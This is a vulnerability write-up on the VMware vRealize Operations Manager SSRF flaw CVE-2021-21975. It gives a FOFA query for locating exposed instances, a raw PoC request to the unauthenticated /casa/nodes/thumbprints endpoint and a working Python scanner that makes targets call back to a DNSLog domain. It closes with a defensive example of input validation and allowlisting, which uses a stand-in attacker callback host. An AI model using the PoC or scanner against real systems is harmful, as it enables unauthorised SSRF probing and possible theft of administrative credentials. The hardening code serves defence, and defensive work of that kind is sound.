# VMware vRealize Operations Manager API SSRF漏洞 (CVE-2021-21975)

An attacker with network access to the vRealize Operations Manager API can pass crafted parameters that the server then uses to make its own outbound requests (server-side request forgery). VMware's advisory states this can be used to steal administrative credentials and thereby gain control of some functionality. The vulnerable endpoint, `/casa/nodes/thumbprints`, accepts a JSON list of node addresses and connects to each of them from the appliance itself, without requiring authentication.

OVA download: https://my.vmware.com/group/vmware/patch#search

FOFA:

```
app="vmware-vRealize-Operations-Manager"
```

Affected versions:

* vRealize Operations Manager 8.3.0
* vRealize Operations Manager 8.2.0
* vRealize Operations Manager 8.1.1
* vRealize Operations Manager 8.1.0
* vRealize Operations Manager 8.0.1
* vRealize Operations Manager 8.0.0
* vRealize Operations Manager 7.5.0

**PoC:**

```
POST /casa/nodes/thumbprints HTTP/1.1
Host: target
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

["127.0.0.1:443/ui/"]
```

nuclei PoC: https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-21975.yaml

poc.py:

```py
# CVE-2021-21975
# fofa: title="vRealize Operations Manager"

import requests
import urllib3

# The appliance uses a self-signed certificate, so suppress the TLS warnings
# that verify=False would otherwise print on every request.
urllib3.disable_warnings()


def title():
    print("[-------------------------------------------------------------]")
    print("[-------- VMware vRealize Operations Manager SSRF ------------]")
    print("[-------- CVE-2021-21975 -------------------------------------]")
    print("[-------- use: python3 CVE-2021-21975 ------------------------]")
    print("[-------- Author: Henry4E36 ----------------------------------]")
    print("[-------------------------------------------------------------]")


def target_url(url, dnslog):
    # The endpoint takes a JSON list of "host:port" strings and connects to
    # each one from the server side, so a DNSLog domain serves as the callback.
    api_url = url.rstrip("/") + "/casa/nodes/thumbprints"
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:86.0) Gecko/20100101 Firefox/86.0",
        "Content-Type": "application/json;charset=UTF-8",
    }
    data = f'["{dnslog}"]'
    try:
        res = requests.post(url=api_url, headers=headers, data=data, verify=False, timeout=5)
        # A 200 only means the endpoint accepted the list; the DNSLog hit is
        # the actual evidence that the server made the outbound request.
        if res.status_code == 200:
            print(f"[!] \033[31mTarget {url} may be vulnerable to SSRF, check the DNSLog for a hit!\033[0m")
            print(f"[0] Response: {res.text}")
        else:
            print(f"[0] Target {url} does not appear to be vulnerable to SSRF")
    except Exception as e:
        print("[!] Unexpected error while contacting the target!\n", e)


if __name__ == "__main__":
    title()
    url = str(input("[-] Enter the URL to test:\n"))
    dnslog = str(input("[-] Enter the DNSLog domain:\n"))
    target_url(url, dnslog)
```
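The PoC body `["127.0.0.1:443/ui/"]` works because the server treats each list entry as the address it will connect to, path included. The following is an added example, not code from the original post or from VMware, showing the vulnerable pattern next to the input handling a hardened version of a "fetch these nodes' TLS thumbprints" endpoint should apply: parse each entry as a strict `host:port`, refuse anything that points back into the appliance, and only contact addresses that are already registered cluster members. `KNOWN_CLUSTER_NODES`, the sample request body and the function names are assumptions made for this example.

```python
"""Added example: vulnerable vs. hardened handling of request-supplied node addresses."""
from __future__ import annotations

import hashlib
import ipaddress
import re
import ssl

# Constructed allowlist for this example: the cluster members an administrator
# already registered. A real implementation would read them from cluster state,
# never from the request body.
KNOWN_CLUSTER_NODES = {("10.0.0.11", 443), ("10.0.0.12", 443)}

# Strict host:port only. No scheme, userinfo, path or query can survive this.
_HOSTPORT = re.compile(r"(?P<host>[A-Za-z0-9.\-]+|\[[0-9A-Fa-f:.]+\]):(?P<port>\d{1,5})")


class RejectedNode(ValueError):
    """Raised when a request-supplied node address fails validation."""


def vulnerable_target_url(entry: str) -> str:
    """The vulnerable pattern: the request-supplied string is spliced straight into
    the URL the server fetches, so "127.0.0.1:443/ui/" becomes a request to the
    appliance's own UI and a DNSLog host becomes an out-of-band callback."""
    return "https://" + entry


def parse_node_address(entry: str) -> tuple[str, int]:
    """Parse a bare host:port and reject anything that is not exactly that shape
    or that addresses the appliance itself."""
    m = _HOSTPORT.fullmatch(entry.strip())
    if m is None:
        raise RejectedNode(f"not a bare host:port: {entry!r}")
    host, port = m["host"].strip("[]"), int(m["port"])
    if not 1 <= port <= 65535:
        raise RejectedNode(f"port out of range: {port}")
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host, port  # a hostname; the allowlist check decides its fate
    if ip.is_loopback or ip.is_link_local or ip.is_unspecified:
        raise RejectedNode(f"address points at the appliance itself: {host}")
    return host, port


def authorized_node(entry: str, allowed=KNOWN_CLUSTER_NODES) -> tuple[str, int]:
    """Hardened form: only addresses already known as cluster members pass."""
    node = parse_node_address(entry)
    if node not in allowed:
        raise RejectedNode(f"not a registered cluster node: {entry!r}")
    return node


def thumbprint_from_der(der: bytes) -> str:
    """SHA-1 fingerprint of a DER-encoded certificate as colon-separated hex."""
    digest = hashlib.sha1(der).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def fetch_thumbprint(entry: str) -> str:
    """Network path: validate first, then connect only to the authorized node."""
    host, port = authorized_node(entry)
    pem = ssl.get_server_certificate((host, port))
    return thumbprint_from_der(ssl.PEM_cert_to_DER_cert(pem))


def triage(entries: list[str]) -> dict[str, dict]:
    """Run the hardened check over a whole request body and report per entry."""
    report: dict[str, dict] = {"accepted": {}, "rejected": {}}
    for entry in entries:
        try:
            report["accepted"][entry] = authorized_node(entry)
        except RejectedNode as exc:
            report["rejected"][entry] = str(exc)
    return report


if __name__ == "__main__":
    # Constructed request body: the page's PoC entry, a DNSLog-style callback,
    # an IPv6 loopback, one legitimate node and one unknown internal host.
    body = ["127.0.0.1:443/ui/", "attacker.dnslog.example:80", "[::1]:443",
            "10.0.0.11:443", "10.0.0.99:443"]
    for entry in body:
        print(f"vulnerable pattern would fetch: {vulnerable_target_url(entry)}")
    for kind, items in triage(body).items():
        for entry, detail in items.items():
            print(f"{kind}: {entry} -> {detail}")
```

Only `10.0.0.11:443` reaches `fetch_thumbprint`; the PoC entry fails the shape check before any address logic runs, and the DNSLog host is rejected by the allowlist even though it parses cleanly, which is the check that stops the out-of-band probe.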

References:

* https://www.vmware.com/security/advisories/VMSA-2021-0004.html
* https://forum.ywhack.com/thread-115338-1-7.html
